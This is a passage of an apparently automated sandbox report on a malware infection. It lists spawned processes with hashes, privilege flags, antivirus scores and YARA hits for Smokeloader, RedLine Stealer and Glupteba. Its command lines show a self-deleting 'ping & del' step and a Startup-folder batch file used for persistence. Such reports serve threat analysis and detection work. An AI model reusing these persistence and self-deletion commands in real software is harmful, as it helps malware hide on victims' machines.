MD5 hash:54F38AF9A5ADA40065F7B6008661E8A1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000010.00000002.3306333274.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:17
Start time:03:30:58
Start date:11/03/2024
Path:C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe"
Imagebase:0x400000
File size:4'283'768 bytes
MD5 hash:54F38AF9A5ADA40065F7B6008661E8A1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000011.00000002.3216774766.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
• Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

                                                                                                                                                                                                                                                            Target ID:18
                                                                                                                                                                                                                                                            Start time:03:30:58
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000012.00000002.3306276662.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                                            Start time:03:30:58
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                                            Start time:03:30:58
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                                            Start time:03:31:02
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:323'584 bytes
                                                                                                                                                                                                                                                            MD5 hash:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                                            Start time:03:31:02
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:237'568 bytes
                                                                                                                                                                                                                                                            MD5 hash:ED7321DFC04F801D87AB2F3B4ABCB8FB
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                                            Start time:03:31:02
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                                            Start time:03:31:02
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000019.00000002.3061309929.0000000000843000.00000040.00000001.01000000.0000001C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000019.00000002.3250452098.00000000032C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000019.00000002.3250452098.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:323'584 bytes
                                                                                                                                                                                                                                                            MD5 hash:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:323'584 bytes
                                                                                                                                                                                                                                                            MD5 hash:D9578A8E9EE343BC53B08FD8101F66E9
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                                            • Detection: 58%, ReversingLabs
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                                                                                                                                                                                                                                                            Imagebase:0x790000
                                                                                                                                                                                                                                                            File size:236'544 bytes
                                                                                                                                                                                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                                            Start time:03:31:03
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001E.00000002.3216770112.0000000003203000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001E.00000002.3216770112.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001E.00000002.3043788624.0000000000843000.00000040.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001E.00000002.3187121792.0000000001021000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                                            Start time:03:31:04
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                                            Start time:03:31:04
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'768 bytes
                                                                                                                                                                                                                                                            MD5 hash:54F38AF9A5ADA40065F7B6008661E8A1
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000002.3398211956.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.3381975417.0000000000FDD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000020.00000002.3398211956.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000020.00000002.3259586341.0000000000843000.00000040.00000001.01000000.0000001F.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                                            Start time:03:31:07
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000021.00000002.3183308151.0000000000843000.00000040.00000001.01000000.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000021.00000002.3298037878.0000000003203000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.3266926233.000000000111E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000021.00000002.3298037878.0000000002DC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                                            Start time:03:31:07
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\gIvDEh2BZp9B1K9gi8nXHxAG.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:1'878'244 bytes
                                                                                                                                                                                                                                                            MD5 hash:BD90ED9339BF690DAF83101CAA9EC91A
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                                            Start time:03:31:07
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                                            Start time:03:31:09
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exe"
                                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                                            File size:4'283'792 bytes
                                                                                                                                                                                                                                                            MD5 hash:C03384EE0CB8E3A2FD0C84052AC0581F
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000024.00000002.3385094968.0000000001171000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000024.00000002.3409633902.0000000003253000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 00000024.00000002.3263335917.0000000000843000.00000040.00000001.01000000.00000022.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000024.00000002.3409633902.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                                                                            Start time:03:31:13
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\rundll32.exe
Imagebase:0xda0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:38
Start time:03:31:17
Start date:11/03/2024
Path:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
Imagebase:0x400000
File size:237'568 bytes
MD5 hash:ED7321DFC04F801D87AB2F3B4ABCB8FB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:03:31:17
Start date:11/03/2024
Path:C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\rundll32.exe
Imagebase:0xda0000
File size:61'440 bytes
MD5 hash:889B99C52A60DD49227C5E485A016679
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:40
Start time:03:31:17
Start date:11/03/2024
Path:C:\Windows\SysWOW64\PING.EXE
Wow64 process (32bit):true
Commandline:ping 127.0.0.1 -n 3
Imagebase:0x7a0000
File size:18'944 bytes
MD5 hash:B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:03:31:24
Start date:11/03/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://hentaitoonami.com/
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:43
Start time:03:31:27
Start date:11/03/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2396 --field-trial-handle=2216,i,3713958764592762144,12864230647668828489,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff715980000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:44
Start time:03:31:28
Start date:11/03/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" "
Imagebase:0x7ff7e4260000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:03:31:28
Start date:11/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:03:31:38
Start date:11/03/2024
Path:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
Imagebase:0x400000
